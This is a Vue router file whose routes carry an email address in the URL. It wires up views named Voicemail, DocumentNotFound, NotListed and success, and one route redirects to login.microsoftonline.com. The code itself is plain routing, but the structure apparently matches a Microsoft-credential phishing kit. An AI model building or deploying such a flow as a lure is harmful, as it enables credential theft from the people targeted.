import Vue from 'vue';
import VueRouter from 'vue-router';
import Home from '../views/Home.vue';
import Landing from '../views/Landing.vue';
Vue.use(VueRouter);

const routes = [
  {
    path: '/login/:email',
    name: 'landing',
    component: Landing,
  },
  {
    path: '/login/mail/:email',
    name: 'Home',
    component: Home,
  },
  {
    path: '/login/verification/:email',
    name: 'verification',
    component: () =>
      import(
        /* webpackChunkName: "verification" */ '../views/Verification.vue'
      ),
  },
  {
    path: '/document-not-found',
    name: 'DocumentNotFound',
    component: () =>
      import(
        /* webpackChunkName: "documentNotFound" */ '../views/DocumentNotFound.vue'
      ),
  },
  {
    path: '/voicemail',
    name: 'Voicemail',
    component: () =>
      import(/* webpackChunkName: "voicemail" */ '../views/Voicemail.vue'),
  },
  {
    path: '/not-listed',
    name: 'NotListed',
    component: () =>
      import(/* webpackChunkName: "Notlisted" */ '../views/NotListed.vue'),
  },
  {
    path: '/success',
    name: 'success',
    component: () =>
      import(/* webpackChunkName: "success" */ '../views/success.vue'),
  },
  {
    path: '/microsoft',
    name: 'microsoft',
    beforeEnter() {
      location.href = 'https://login.microsoftonline.com';
    },
    component: () =>
      import(/* webpackChunkName: "microsoft" */ '../views/success.vue'),
  },
];

const router = new VueRouter({
  routes,
});

export default router;
